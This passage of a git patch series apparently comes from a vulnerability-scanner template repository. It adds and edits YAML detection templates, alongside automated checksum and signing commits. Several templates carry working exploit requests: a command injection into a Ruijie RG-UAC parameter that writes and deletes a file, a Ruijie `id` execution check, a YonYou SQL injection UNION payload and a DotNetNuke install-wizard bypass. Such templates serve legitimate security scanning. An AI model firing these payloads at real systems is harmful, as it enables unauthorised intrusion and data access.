{{Hostname}} + + - | + GET /v{{version}}/containers/json HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: or + matchers: + - type: word + part: body + words: + - "Id" + - "Names" + - "Image" + - "Command" + - "PrivatePort" + - "PublicPort" + condition: and + - type: word + part: body + words: + - '[]' + + + extractors: + - type: regex + name: version + group: 1 + regex: + - '"ApiVersion":"(.*?)"' + internal: true + From 652b67b88a8f074b6f98c29b3dd148c8aeb1a300 Mon Sep 17 00:00:00 2001 From: Arm!tage Date: Mon, 25 Dec 2023 11:31:03 +0800 Subject: [PATCH 20/64] fix syntax --- http/exposures/docker-daemon-exposed.yaml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/http/exposures/docker-daemon-exposed.yaml b/http/exposures/docker-daemon-exposed.yaml index e9601013b9..b313542011 100644 --- a/http/exposures/docker-daemon-exposed.yaml +++ b/http/exposures/docker-daemon-exposed.yaml @@ -15,13 +15,13 @@ info: http: - raw: - - | - GET /version HTTP/1.1 - Host: {{Hostname}} + - | + GET /version HTTP/1.1 + Host: {{Hostname}} - - | - GET /v{{version}}/containers/json HTTP/1.1 - Host: {{Hostname}} + - | + GET /v{{version}}/containers/json HTTP/1.1 + Host: {{Hostname}} matchers-condition: or matchers: From 051c0f22b3a71c5b6832fef166e12f553186319c Mon Sep 17 00:00:00 2001 From: Arm!tage Date: Mon, 25 Dec 2023 11:35:22 +0800 Subject: [PATCH 21/64] remove blank --- http/exposures/docker-daemon-exposed.yaml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/http/exposures/docker-daemon-exposed.yaml b/http/exposures/docker-daemon-exposed.yaml index b313542011..ea9cfd6c0e 100644 --- a/http/exposures/docker-daemon-exposed.yaml +++ b/http/exposures/docker-daemon-exposed.yaml @@ -18,7 +18,7 @@ http: - | GET /version HTTP/1.1 Host: {{Hostname}} - + - | GET /v{{version}}/containers/json HTTP/1.1 Host: {{Hostname}} @@ -40,7 +40,6 @@ http: words: - '[]' - extractors: - type: regex name: version @@ -48,4 +47,3 @@ http: regex: - '"ApiVersion":"(.*?)"' internal: true - From 9ecd7d5a4725f1174937173b492c205b850b45c4 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 25 Dec 2023 23:03:42 +0530 Subject: [PATCH 22/64] minor update --- http/exposures/docker-daemon-exposed.yaml | 10 +++------- 1 file changed, 3 insertions(+), 7 deletions(-) diff --git a/http/exposures/docker-daemon-exposed.yaml b/http/exposures/docker-daemon-exposed.yaml index ea9cfd6c0e..d8be8351a2 100644 --- a/http/exposures/docker-daemon-exposed.yaml +++ b/http/exposures/docker-daemon-exposed.yaml @@ -11,7 +11,7 @@ info: shodan-query: port:2375 product:"docker" fofa-query: app="docker-Daemon" && port="2375" verified: true - tags: docker,exposure + tags: docker,exposure,misconfig http: - raw: @@ -23,10 +23,10 @@ http: GET /v{{version}}/containers/json HTTP/1.1 Host: {{Hostname}} - matchers-condition: or + matchers-condition: and matchers: - type: word - part: body + part: body_2 words: - "Id" - "Names" @@ -35,10 +35,6 @@ http: - "PrivatePort" - "PublicPort" condition: and - - type: word - part: body - words: - - '[]' extractors: - type: regex From dc0ad486a4b21da96ead01e4fbd353c23236cfa7 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Mon, 25 Dec 2023 23:17:23 +0530 Subject: [PATCH 23/64] Update ruijie-rg-eg-web-mis-rce.yaml --- .../ruijie/ruijie-rg-eg-web-mis-rce.yaml | 15 ++++++--------- 1 file changed, 6 insertions(+), 9 deletions(-) diff --git a/http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml b/http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml index fdacc071c8..820d14b1d4 100644 --- a/http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml +++ b/http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml @@ -31,13 +31,10 @@ http: - method: GET path: - "{{BaseURL}}/update.php?jungle=id" - matchers-condition: and - matchers: - - type: regex - part: body - regex: - - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)" - - type: status - status: - - 200 + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'regex("uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)", body)' + condition: and From 73d0eafada408020c933adfd9b2646c9d83bf0f9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 25 Dec 2023 17:50:33 +0000 Subject: [PATCH 25/64] Auto Generated Templates Checksum [Mon Dec 25 17:50:33 UTC 2023] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index acb1d61ef4..2bcb839ab1 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -18,7 +18,7 @@ dns/azure-takeover-detection.yaml:34e8e8a0db3e2ff7af0bf8df8ee9c54f2ee8e3b4 dns/caa-fingerprint.yaml:71845ba0a32b1968e23b507166275ee4c1f84b24 dns/detect-dangling-cname.yaml:0c5204f22465c8ebb8ae31e6265ffa5c0cd4b6e2 dns/dmarc-detect.yaml:d60f87ac8a617c0496d558269abd50389bbb1b37 -dns/dns-saas-service-detection.yaml:d72feb3c8e7147f9bc37020843647992016b7659 +dns/dns-saas-service-detection.yaml:b8c52b43fb206b466fa4c22b0ac8a553d050b8e5 dns/dns-waf-detect.yaml:f7746eceeca514f20911c4152f2c17bbeb10242c dns/dnssec-detection.yaml:ce828fea84336b2c79b18479063e1e1aaf083592 dns/ec2-detection.yaml:689933e484835fda36da5f3402df123405cc8644 @@ -4081,7 +4081,7 @@ http/exposures/backups/froxlor-database-backup.yaml:a8296d723d545dea6b9d898766db http/exposures/backups/php-backup-files.yaml:704953727958a0d9548426b00a0cb2d8558e31a5 http/exposures/backups/settings-php-files.yaml:466d0c870b539961c1cafb1b2e758aec08711df8 http/exposures/backups/sql-dump.yaml:370dbe1277256449870f9eb992b6a90ca636e887 -http/exposures/backups/zip-backup-files.yaml:47253ccff6b54b2567784cdb93e322e636337303 +http/exposures/backups/zip-backup-files.yaml:487c3ae6d577218c258810b2c0ed55fc361cd3fd http/exposures/configs/accueil-wampserver.yaml:d33e2f3e0f198426999fff6bcd7d1344b5c46240 http/exposures/configs/airflow-configuration-exposure.yaml:b212acd4a5ef9cbb3e0b84da2b4a3cd8599aa1b3 http/exposures/configs/alibaba-canal-info-leak.yaml:9a0d928feb9c023e106d2e5fb6d4d6bab4e84297 @@ -7707,7 +7707,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:f6a60c9b6234a281d22af2436c44dac52ccac831 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:eac3197b9e6ec0342dff2ef774c6785c852868b4 -templates-checksum.txt:10238dd5a08d3f60e31e1a95f4f1eb8bc0349f35 +templates-checksum.txt:b7165bda67e32d39a15bd947b0f07412cf4d7d5f wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From ab1bf228dcd2b534150273d5b3a0068b414aa912 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 25 Dec 2023 17:50:36 +0000 Subject: [PATCH 26/64] Auto Generated New Template Addition List [Mon Dec 25 17:50:35 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index e69de29bb2..5d5a921fdf 100644 --- a/.new-additions +++ b/.new-additions @@ -0,0 +1 @@ +http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml From 77a9300ee55269e784a9f32f1848e855a823fc4f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 25 Dec 2023 17:52:10 +0000 Subject: [PATCH 27/64] Auto Template Signing [Mon Dec 25 17:52:10 UTC 2023] :robot: --- dns/dns-saas-service-detection.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/dns/dns-saas-service-detection.yaml b/dns/dns-saas-service-detection.yaml index 6fce566744..5039ed4161 100644 --- a/dns/dns-saas-service-detection.yaml +++ b/dns/dns-saas-service-detection.yaml @@ -434,5 +434,4 @@ dns: regex: - "IN\tCNAME\\t(.+)$" - "IN\\s*CNAME\\t(.+)$" - -# digest: 4a0a004730450221008eca40fb73f32c811d6d1d7283bbf220eb09a81bbaa047e4204406dd1c4da012022033a3e578c9ee7d903cff9bc617af38353d49ba0cb65955487aca3e841cdbfc56:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402205694ac1cba58232ec715831e94086da7081a9b756f86016358b1347a1a340787022040615d63a66787d706d2be8b3f13cead87f7278c471091a7783bfab4e4fa2aef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From b47589f66b86ba52489c6f3ecd0ff3cc80c739b3 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 26 Dec 2023 07:08:21 +0530 Subject: [PATCH 28/64] add verified --- http/token-spray/api-openai.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/token-spray/api-openai.yaml b/http/token-spray/api-openai.yaml index a472f5d046..408e12485c 100644 --- a/http/token-spray/api-openai.yaml +++ b/http/token-spray/api-openai.yaml @@ -8,6 +8,7 @@ info: - https://platform.openai.com/docs/api-reference metadata: max-request: 1 + verified: true tags: token-spray,openai self-contained: true From ca155134ce9052f5f1d60b810cf906b313cd3fc7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 26 Dec 2023 01:42:52 +0000 Subject: [PATCH 29/64] Auto Generated New Template Addition List [Tue Dec 26 01:42:52 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 5d5a921fdf..9d24e17c29 100644 --- a/.new-additions +++ b/.new-additions @@ -1 +1,2 @@ +http/token-spray/api-openai.yaml http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml From 895aefe3f5df3676deb791d1b78d896f1ddf2308 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 26 Dec 2023 01:42:58 +0000 Subject: [PATCH 30/64] Auto Generated Templates Checksum [Tue Dec 26 01:42:58 UTC 2023] :robot: --- templates-checksum.txt | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 2bcb839ab1..9c9f108b15 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -18,7 +18,7 @@ dns/azure-takeover-detection.yaml:34e8e8a0db3e2ff7af0bf8df8ee9c54f2ee8e3b4 dns/caa-fingerprint.yaml:71845ba0a32b1968e23b507166275ee4c1f84b24 dns/detect-dangling-cname.yaml:0c5204f22465c8ebb8ae31e6265ffa5c0cd4b6e2 dns/dmarc-detect.yaml:d60f87ac8a617c0496d558269abd50389bbb1b37 -dns/dns-saas-service-detection.yaml:b8c52b43fb206b466fa4c22b0ac8a553d050b8e5 +dns/dns-saas-service-detection.yaml:d43ab2edca6bc38254ad1f4c4889e5cece34691e dns/dns-waf-detect.yaml:f7746eceeca514f20911c4152f2c17bbeb10242c dns/dnssec-detection.yaml:ce828fea84336b2c79b18479063e1e1aaf083592 dns/ec2-detection.yaml:689933e484835fda36da5f3402df123405cc8644 @@ -6621,6 +6621,7 @@ http/token-spray/api-nytimes.yaml:515f52e0dbaa76c67e47a0e0f63a607b966520d7 http/token-spray/api-onelogin.yaml:c1970dce04c68ff40687f9aa5189fbdf2f07bdd2 http/token-spray/api-onyphe.yaml:c931393e726323591b3f170ddda5e4dd548e4c8a http/token-spray/api-open-page-rank.yaml:291f62ec42ea118f68223e44043d39e1c6d616a2 +http/token-spray/api-openai.yaml:9d86191e26bae37c68d5986d46e1ee613b81eb7c http/token-spray/api-opengraphr.yaml:5c15cfdbb054e77687564346951337cc0904f151 http/token-spray/api-openweather.yaml:489a77cb31f3b4510b748c12ec2104d6a43a6ec7 http/token-spray/api-opsgenie.yaml:bb7a91bd82ee7c96607e1963dbbf8b41af56832a @@ -7208,6 +7209,7 @@ http/vulnerabilities/ruijie/ruijie-excu-shell.yaml:4e44d86d3461ede6a3e205a00a96c http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml:d21221f94ba84906b86aebb2ef888e8df203035f http/vulnerabilities/ruijie/ruijie-networks-lfi.yaml:c3789288ed1f6805695c9ccc837a1b056f017975 http/vulnerabilities/ruijie/ruijie-password-leak.yaml:b40b0764c02ffb6af9faef8f9153a8995c0f0522 +http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml:1ab8db1b41bfc5e613f4fbe99f417739d332eb31 http/vulnerabilities/ruijie-eg-login-rce.yaml:95135a8fbb28e97e78f39b9c640f6dca3a49c283 http/vulnerabilities/samsung/samsung-wlan-ap-lfi.yaml:48d0b9ac33013573db9fa5ecc17282a88729fda9 http/vulnerabilities/samsung/samsung-wlan-ap-rce.yaml:a4258c6a3d83986629e3a30e17e98de93180ffdc @@ -7707,7 +7709,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:f6a60c9b6234a281d22af2436c44dac52ccac831 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:eac3197b9e6ec0342dff2ef774c6785c852868b4 -templates-checksum.txt:b7165bda67e32d39a15bd947b0f07412cf4d7d5f +templates-checksum.txt:42fd128a2bf9803063b17dfe3796e7c460f14fa4 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 1919622dc66c48e8f08c8ecd388013e2a04f74c8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 26 Dec 2023 01:44:36 +0000 Subject: [PATCH 31/64] Auto Template Signing [Tue Dec 26 01:44:36 UTC 2023] :robot: --- http/token-spray/api-openai.yaml | 1 + http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/token-spray/api-openai.yaml b/http/token-spray/api-openai.yaml index 408e12485c..1cfe8f579d 100644 --- a/http/token-spray/api-openai.yaml +++ b/http/token-spray/api-openai.yaml @@ -44,3 +44,4 @@ http: - 'invalid_api_key' condition: or negative: true +# digest: 4a0a004730450220422646717a6541b29d8c7b75c9b7e1fd29aacfdb32eadd984cd42d10bce9bb8f022100834fe5f01797940eff4f945f61a4e9522a53cfd16f9d6aed5b323fcc0e357051:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml b/http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml index 820d14b1d4..608dcd099f 100644 --- a/http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml +++ b/http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml @@ -38,3 +38,4 @@ http: - 'status_code == 200' - 'regex("uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)", body)' condition: and +# digest: 4a0a004730450220298e4a509f8a4ada203541928158a36e026d8558df1144d2456f0fcac669d723022100b0a5525c3c77ed802dbb654d57bf01b32bf01a811ee1acc813e65a87559786f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 88e104e37f8207f69e3ad54dd3fcd1be4e4bbb30 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 26 Dec 2023 07:20:08 +0530 Subject: [PATCH 32/64] Create ruijie-rg-uac-nmc-sync-rce.yaml --- .../ruijie/ruijie-rg-uac-nmc-sync-rce.yaml | 40 +++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 http/vulnerabilities/ruijie/ruijie-rg-uac-nmc-sync-rce.yaml diff --git a/http/vulnerabilities/ruijie/ruijie-rg-uac-nmc-sync-rce.yaml b/http/vulnerabilities/ruijie/ruijie-rg-uac-nmc-sync-rce.yaml new file mode 100644 index 0000000000..e7ff7a3dba --- /dev/null +++ b/http/vulnerabilities/ruijie/ruijie-rg-uac-nmc-sync-rce.yaml @@ -0,0 +1,40 @@ +id: ruijie-rg-uac-nmc-sync-rce + +info: + name: Ruijie RG-UAC nmc_sync.php - Remote Code Execution + author: DhiyaneshDk + severity: critical + description: | + There is a command execution vulnerability in the nmc_sync.php interface of Ruijie's RG-UAC unified online behavior management and audit system. An unauthenticated attacker can execute arbitrary commands to control server permissions. + reference: + - https://github.com/xinyisleep/pocscan/blob/main/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7_EG%E6%98%93%E7%BD%91%E5%85%B3_%E4%B8%8A%E7%BD%91%E8%A1%8C%E4%B8%BA%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F_%E5%89%8D%E5%8F%B0RCE.py + metadata: + verified: true + max-request: 1 + fofa-query: title="RG-UAC登录页面" && body="admin" || app="Ruijie-RG-UAC" || title="rg-uac" + tags: rg-uac,file-upload,intrusive,ruijie + +variables: + random_str: "{{rand_base(6)}}" + match_str: "{{md5(random_str)}}" + +http: + - raw: + - | + GET /view/systemConfig/management/nmc_sync.php?center_ip=127.0.0.1&template_path=|echo+{{match_str}}+>+{{random_str}}.txt|cat HTTP/1.1 + Host: {{Hostname}} + + - | + GET /view/systemConfig/management/{{random_str}}.txt HTTP/1.1 + Host: {{Hostname}} + + - | + GET /view/systemConfig/management/nmc_sync.php?center_ip=127.0.0.1&template_path=|rm+{{random_str}}.txt|cat HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - "status_code_1 == 200 && status_code_2 == 200" + - "contains(body_2, '{{match_str}}')" + condition: and From 977907614074186ce67343e25dbe2a39f1435429 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 26 Dec 2023 07:50:21 +0530 Subject: [PATCH 33/64] Create yonyou-ksoa-dept-sqli.yaml --- .../yonyou/yonyou-ksoa-dept-sqli.yaml | 38 +++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 http/vulnerabilities/yonyou/yonyou-ksoa-dept-sqli.yaml diff --git a/http/vulnerabilities/yonyou/yonyou-ksoa-dept-sqli.yaml b/http/vulnerabilities/yonyou/yonyou-ksoa-dept-sqli.yaml new file mode 100644 index 0000000000..c01041ca93 --- /dev/null +++ b/http/vulnerabilities/yonyou/yonyou-ksoa-dept-sqli.yaml @@ -0,0 +1,38 @@ +id: yonyou-ksoa-dept-sqli + +info: + name: YonYou KSOA common/dept.jsp - SQL injection + author: DhiyaneshDK + severity: critical + description: | + Yonyou KSOA contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + reference: + - https://mp.weixin.qq.com/s/I6aG2vFIi5nbVZfuVNpyDw + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cwe-id: CWE-89 + metadata: + verified: true + max-request: 1 + fofa-query: app="用友-时空KSOA" + tags: yonyou,oa,sqli,ksoa + +variables: + num: "999999999" + +http: + - method: GET + path: + - "{{BaseURL}}/common/dept.jsp?deptid=1'+UNION+ALL+SELECT+60%2Csys.fn_sqlvarbasetostr(HASHBYTES('MD5'%2C'{{num}}'))--+" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '0x{{md5({{num}})}}' + + - type: status + status: + - 200 From 3115271e9fbfeac3c952010515ed0f69e75b8535 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 26 Dec 2023 07:58:10 +0530 Subject: [PATCH 34/64] additional matcher with or condition --- http/exposures/docker-daemon-exposed.yaml | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/http/exposures/docker-daemon-exposed.yaml b/http/exposures/docker-daemon-exposed.yaml index d8be8351a2..bd264d57f2 100644 --- a/http/exposures/docker-daemon-exposed.yaml +++ b/http/exposures/docker-daemon-exposed.yaml @@ -23,7 +23,7 @@ http: GET /v{{version}}/containers/json HTTP/1.1 Host: {{Hostname}} - matchers-condition: and + matchers-condition: or matchers: - type: word part: body_2 @@ -36,6 +36,14 @@ http: - "PublicPort" condition: and + - type: word + part: body_2 + words: + - '[]' + - '"ImageID": + - '"HostConfig":' + condition: and + extractors: - type: regex name: version From def6cc9a4a29684d6717421b5388607099eaf966 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 26 Dec 2023 07:59:22 +0530 Subject: [PATCH 35/64] Update docker-daemon-exposed.yaml --- http/exposures/docker-daemon-exposed.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposures/docker-daemon-exposed.yaml b/http/exposures/docker-daemon-exposed.yaml index bd264d57f2..1442d6c668 100644 --- a/http/exposures/docker-daemon-exposed.yaml +++ b/http/exposures/docker-daemon-exposed.yaml @@ -40,7 +40,7 @@ http: part: body_2 words: - '[]' - - '"ImageID": + - '"ImageID":' - '"HostConfig":' condition: and From 71410961884a22bc5dd81b89608a7b96083e3952 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 26 Dec 2023 08:01:41 +0530 Subject: [PATCH 36/64] lint fix --- http/exposures/docker-daemon-exposed.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposures/docker-daemon-exposed.yaml b/http/exposures/docker-daemon-exposed.yaml index 1442d6c668..b0f94be1b1 100644 --- a/http/exposures/docker-daemon-exposed.yaml +++ b/http/exposures/docker-daemon-exposed.yaml @@ -43,7 +43,7 @@ http: - '"ImageID":' - '"HostConfig":' condition: and - + extractors: - type: regex name: version From 8b25425d9b3ce41c3d006c418ee535b6ecaf8f62 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 26 Dec 2023 14:54:37 +0530 Subject: [PATCH 37/64] Create CVE-2015-2794.yaml --- http/cves/2015/CVE-2015-2794.yaml | 44 +++++++++++++++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 http/cves/2015/CVE-2015-2794.yaml diff --git a/http/cves/2015/CVE-2015-2794.yaml b/http/cves/2015/CVE-2015-2794.yaml new file mode 100644 index 0000000000..3b04db48ad --- /dev/null +++ b/http/cves/2015/CVE-2015-2794.yaml @@ -0,0 +1,44 @@ +id: CVE-2015-2794 + +info: + name: DotNetNuke 07.04.00 - Administration Authentication Bypass + author: 1337kro + severity: high + description: | + The installation wizard in DotNetNuke (DNN) before 7.4.1 allows remote attackers to reinstall the application and gain SuperUser access via a direct request to Install/InstallWizard.aspx. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2015-2794 + - https://www.exploit-db.com/exploits/39777 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2015-2794 + cwe-id: CWE-264 + epss-score: 0.9711 + epss-percentile: 0.99736 + cpe: cpe:2.3:a:dotnetnuke:dotnetnuke:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: dotnetnuke + product: dotnetnuke + verified: true + fofo-query: app="DotNetNuke" + tags: cve,cve2015,dotnetnuke,auth-bypass,install + +http: + - method: GET + path: + - "{{BaseURL}}/Install/InstallWizard.aspx?__VIEWSTATE" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Administrative Information" + - "Database Information" + condition: and + + - type: status + status: + - 200 From fcd3d55a60c8d8b61395e6056e83a6b08268cc11 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 26 Dec 2023 15:00:03 +0530 Subject: [PATCH 38/64] severity update and lint fix --- http/cves/2015/CVE-2015-2794.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2015/CVE-2015-2794.yaml b/http/cves/2015/CVE-2015-2794.yaml index 3b04db48ad..ca3d0cdf13 100644 --- a/http/cves/2015/CVE-2015-2794.yaml +++ b/http/cves/2015/CVE-2015-2794.yaml @@ -3,7 +3,7 @@ id: CVE-2015-2794 info: name: DotNetNuke 07.04.00 - Administration Authentication Bypass author: 1337kro - severity: high + severity: critical description: | The installation wizard in DotNetNuke (DNN) before 7.4.1 allows remote attackers to reinstall the application and gain SuperUser access via a direct request to Install/InstallWizard.aspx. reference: @@ -26,7 +26,7 @@ info: tags: cve,cve2015,dotnetnuke,auth-bypass,install http: - - method: GET + - method: GET path: - "{{BaseURL}}/Install/InstallWizard.aspx?__VIEWSTATE" From 35e2acbcd622a3edd3c34e41730b7977b2d2a267 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 26 Dec 2023 14:30:15 +0000 Subject: [PATCH 39/64] Auto Generated New Template Addition List [Tue Dec 26 14:30:15 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 9d24e17c29..42a4564a2a 100644 --- a/.new-additions +++ b/.new-additions @@ -1,2 +1,3 @@ +http/cves/2015/CVE-2015-2794.yaml http/token-spray/api-openai.yaml http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml From 35a02a30656fe174dd114707a2b909f6d19de863 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 26 Dec 2023 14:30:17 +0000 Subject: [PATCH 40/64] Auto Generated cves.json [Tue Dec 26 14:30:17 UTC 2023] :robot: --- cves.json | 1 + cves.json-checksum.txt | 2 +- 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index b67a7f0312..5227679936 100644 --- a/cves.json +++ b/cves.json @@ -271,6 +271,7 @@ {"ID":"CVE-2015-2166","Info":{"Name":"Ericsson Drutt MSDP - Local File Inclusion","Severity":"medium","Description":"Ericsson Drutt Mobile Service Delivery Platform (MSDP) 4, 5, and 6 allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the default URI in the Instance Monitor.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-2166.yaml"} {"ID":"CVE-2015-2196","Info":{"Name":"WordPress Spider Calendar \u003c=1.4.9 - SQL Injection","Severity":"high","Description":"WordPress Spider Calendar plugin through 1.4.9 is susceptible to SQL injection. An attacker can execute arbitrary SQL commands via the cat_id parameter in a spiderbigcalendar_month action to wp-admin/admin-ajax.php, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-2196.yaml"} {"ID":"CVE-2015-2755","Info":{"Name":"WordPress AB Google Map Travel \u003c=3.4 - Stored Cross-Site Scripting","Severity":"medium","Description":"WordPress AB Google Map Travel plugin through 3.4 contains multiple stored cross-site scripting vulnerabilities. The plugin allows an attacker to hijack the administrator authentication for requests via the (1) lat (Latitude), (2) long (Longitude), (3) map_width, (4) map_height, or (5) zoom (Map Zoom) parameters in the ab_map_options page to wp-admin/admin.php.\n","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2015/CVE-2015-2755.yaml"} +{"ID":"CVE-2015-2794","Info":{"Name":"DotNetNuke 07.04.00 - Administration Authentication Bypass","Severity":"critical","Description":"The installation wizard in DotNetNuke (DNN) before 7.4.1 allows remote attackers to reinstall the application and gain SuperUser access via a direct request to Install/InstallWizard.aspx.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2015/CVE-2015-2794.yaml"} {"ID":"CVE-2015-2807","Info":{"Name":"Navis DocumentCloud \u003c0.1.1 - Cross-Site Scripting","Severity":"medium","Description":"Navis DocumentCloud plugin before 0.1.1 for WordPress contains a reflected cross-site scripting vulnerability in js/window.php which allows remote attackers to inject arbitrary web script or HTML via the wpbase parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-2807.yaml"} {"ID":"CVE-2015-2863","Info":{"Name":"Kaseya Virtual System Administrator - Open Redirect","Severity":"medium","Description":"Kaseya Virtual System Administrator 7.x before 7.0.0.29, 8.x before 8.0.0.18, 9.0 before 9.0.0.14, and 9.1 before 9.1.0.4 are susceptible to an open redirect vulnerability. An attacker can redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-2863.yaml"} {"ID":"CVE-2015-2996","Info":{"Name":"SysAid Help Desk \u003c15.2 - Local File Inclusion","Severity":"high","Description":"SysAid Help Desk before 15.2 contains multiple local file inclusion vulnerabilities which can allow remote attackers to read arbitrary files via .. (dot dot) in the fileName parameter of getGfiUpgradeFile or cause a denial of service (CPU and memory consumption) via .. (dot dot) in the fileName parameter of calculateRdsFileChecksum.\n","Classification":{"CVSSScore":"8.5"}},"file_path":"http/cves/2015/CVE-2015-2996.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index 71b0875aee..8953152fe4 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -94707e96d497767157be7c0c5b06fac3 +8ba13563d80d4c1e36d4b6dff2c7f027 From 998930ffc2ac56b375c97f6164a006e538f3fd93 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 26 Dec 2023 14:30:36 +0000 Subject: [PATCH 41/64] Auto Generated Templates Checksum [Tue Dec 26 14:30:36 UTC 2023] :robot: --- 